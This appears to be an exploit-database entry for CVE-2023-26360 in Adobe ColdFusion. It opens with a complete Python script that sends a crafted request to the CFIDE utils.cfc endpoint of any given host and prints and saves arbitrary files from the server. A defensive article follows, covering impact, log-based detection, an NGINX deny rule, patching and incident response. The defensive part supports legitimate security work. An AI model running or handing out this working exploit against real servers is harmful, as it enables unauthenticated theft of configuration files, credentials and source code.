Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and earlier - Arbitrary File Read
# Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360
# Google Dork: [not]
# Date: [12/28/2023]
# Exploit Author: [Youssef Muhammad]
# Vendor Homepage: [
https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html]
# Software Link: [
https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0]
# Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and
earlier]
# Tested on: [Windows, Linux]
# CVE : [CVE-2023-26360]
import sys
import requests
import json
BANNER = """
██████ ██ ██ ███████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████
██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ████
██ ██ ██ █████ █████ █████ ██ ██ ██ █████ █████ █████ █████ ███████ █████ ███████ ██ ██ ██
██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██
██████ ████ ███████ ███████ ██████ ███████ ██████ ███████ ██████ ██████ ██████ ██████
"""
RED_COLOR = "\033[91m"
GREEN_COLOR = "\032[42m"
RESET_COLOR = "\033[0m"
def print_banner():
print(RED_COLOR + BANNER + " Developed by SecureLayer7" + RESET_COLOR)
return 0
def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None):
if not endpoint.endswith('.cfc'):
endpoint += '.cfc'
if target_file.endswith('.cfc'):
raise ValueError('The TARGET_FILE must not point to a .cfc')
targeted_file = f"a/{target_file}"
json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []})
vars_get = {'method': 'test', '_cfclient': 'true'}
uri = f'{host}{endpoint}'
response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None)
file_data = None
splatter = '<!-- " ---></TD></TD></TD></TH></TH></TH>'
if response.status_code in [404, 500] and splatter in response.text:
file_data = response.text.split(splatter, 1)[0]
if file_data is None:
raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.')
print(file_data)
# Save the output to a file
output_file_name = 'output.txt'
with open(output_file_name, 'w') as output_file:
output_file.write(file_data)
print(f"The output saved to {output_file_name}")
if __name__ == "__main__":
if not 3 <= len(sys.argv) <= 5:
print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]")
sys.exit(1)
print_banner()
host = sys.argv[1]
target_file = sys.argv[2]
endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc"
proxy_url = sys.argv[4] if len(sys.argv) > 4 else None
try:
run_exploit(host, target_file, endpoint, proxy_url)
except Exception as e:
print(f"Error: {e}")Adobe ColdFusion Arbitrary File Read (CVE-2023-26360) — Overview, Impact, and Mitigation
This article explains the Adobe ColdFusion arbitrary file read vulnerability tracked as CVE-2023-26360, its potential impact, detection techniques, and practical mitigation steps. The content focuses on defensive guidance and safe verification to help administrators reduce exposure and detect exploitation attempts.
What is the vulnerability?
CVE-2023-26360 is an arbitrary file read vulnerability affecting certain releases of Adobe ColdFusion. In affected deployments, specially crafted requests can cause the application to leak the contents of local files to an unauthenticated remote client. Such disclosure can expose configuration files, credentials, source code, and other sensitive artifacts that enable further compromise.
Affected versions
Reportedly affected releases include some builds of ColdFusion 2018, ColdFusion 15 (and earlier), and ColdFusion 2021 up to a specific patch level. Always consult Adobe’s official advisory for the precise fixed builds and the updated list of affected versions before taking action.
Risk and likely impact
- Information disclosure: Attackers can obtain configuration files, database credentials, or API keys stored on disk.
- Privilege escalation and lateral movement: Exposed secrets can be reused to access back-end systems or pivot inside the environment.
- Source code theft: Sensitive business logic or intellectual property could be exfiltrated.
- Chain with other flaws: File disclosure often precedes remote code execution when combined with other misconfigurations.
High-level cause (non-exploitable description)
At a conceptual level, the issue stems from a component accepting untrusted input that ultimately influences which files are read and returned to the client. When input validation or access controls are insufficient, an attacker can cause the application to read arbitrary files on the host filesystem.
Detection: how to spot exploitation attempts
Log indicators
Monitor webserver and ColdFusion logs for anomalous requests that interact with legacy/administrative CFIDE endpoints or include unusual payload parameters. Suspicious signs include:
- Requests to CFIDE, wizards, or other management endpoints from unexpected external IPs.
- Unexpected HTTP 500 or 404 responses correlated with requests to management endpoints.
- Large or unusual response bodies following error codes that contain server-side content.
Example Splunk/SIEM search patterns (illustrative, adjust to your logs):
index=web sourcetype=access_combined
("/CFIDE" OR "wizards" OR "/cfide/administrator")
| stats count by clientip, uri, status
| where count > 5This query locates frequent hits to CFIDE-related URIs. Adjust thresholds and enrich with geoip or user-agent filtering for noisy sources.
Simple log scanner (defensive)
#!/usr/bin/env python3
# Simple defensive scanner: count requests referencing CFIDE from an Apache combined log.
import re
from collections import Counter
pattern = re.compile(r'\"(?:GET|POST) (?P/[^ ]*CFIDE[^ ]*) ')
counter = Counter()
with open('/var/log/apache2/access.log', 'r', encoding='utf-8', errors='ignore') as f:
for line in f:
m = pattern.search(line)
if m:
counter[m.group('uri')] += 1
for uri, cnt in counter.most_common(50):
print(f"{cnt:6d} {uri}")Explanation: This safe script scans an Apache access log for requested URIs that include "CFIDE" and reports the most frequent entries. It is for detection only — do not use it to probe external systems.
Mitigation and hardening
1) Apply vendor patches (primary remediation)
- Immediately review Adobe’s security advisory and apply any vendor-provided patches or hotfixes for ColdFusion. Patching is the most reliable fix.
- Verify the ColdFusion build/version after patching and validate functionality in a staging environment before rolling out to production.
2) Reduce exposure with web server controls
If you cannot immediately patch, reduce the attack surface by blocking or restricting access to administrative and legacy CFIDE directories at the web server layer.
# NGINX: deny access to CFIDE from the public internet; allow only an admin IP
location ~* /CFIDE/ {
allow 10.0.0.5; # replace with admin IP
deny all;
return 403;
}Explanation: This NGINX rule blocks public access to any path under /CFIDE/ except from a whitelisted administrative IP. Replace the IP and integrate with your reverse proxy rules as needed.
3) Use WAF rules and network controls
- Deploy WAF rules to inspect and block suspicious request patterns targeting ColdFusion administrative endpoints.
- Restrict access to management endpoints to internal networks or VPNs only via firewall rules or network ACLs.
4) Remove or restrict unused components
- If CFIDE wizards or other optional administrative features are not required, remove or disable them.
- Ensure file system permissions follow the principle of least privilege so that the ColdFusion process cannot read arbitrary sensitive files.
5) Detect and remediate leaked secrets
If you suspect a disclosure, rotate any secrets (database credentials, API keys, certificates) that may have been exposed and audit access to sensitive systems.
Incident response checklist
| Step | Action |
|---|---|
| Containment | Block access to CFIDE endpoints at the firewall/webserver and apply temporary WAF rules. |
| Eradication | Apply vendor patches and remove unused CFIDE components. |
| Recovery | Restore services from known-good backups where necessary and verify integrity. |
| Lessons learned | Update patching processes, telemetry, and test the mitigations in dev/staging. |
Testing safely
Do not run exploit code against systems you do not own or administer. For in-house testing, create an isolated lab (air-gapped or on private VLAN) that mirrors production, apply the vendor patch in a separate environment, and validate mitigations there first. Use non-sensitive test files and documented reproduction steps from the vendor advisory if they supply safe guidance.
Resources and references
- Adobe product security advisories and ColdFusion patch documentation (official vendor source).
- CVE-2023-26360 — reference identifier for tracking advisories and community detection rules.
- General best practices: least privilege, network segmentation, regular patching, and centralized logging/alerting.
Summary
CVE-2023-26360 is an important file-disclosure issue for ColdFusion environments that can expose sensitive information. The recommended response is to apply the official Adobe patch as soon as possible, restrict access to administrative CFIDE endpoints using web server and firewall controls, deploy WAF protections, and scan logs for suspicious activity. If you suspect compromise, follow containment and secret-rotation steps and perform a full investigation in a controlled manner.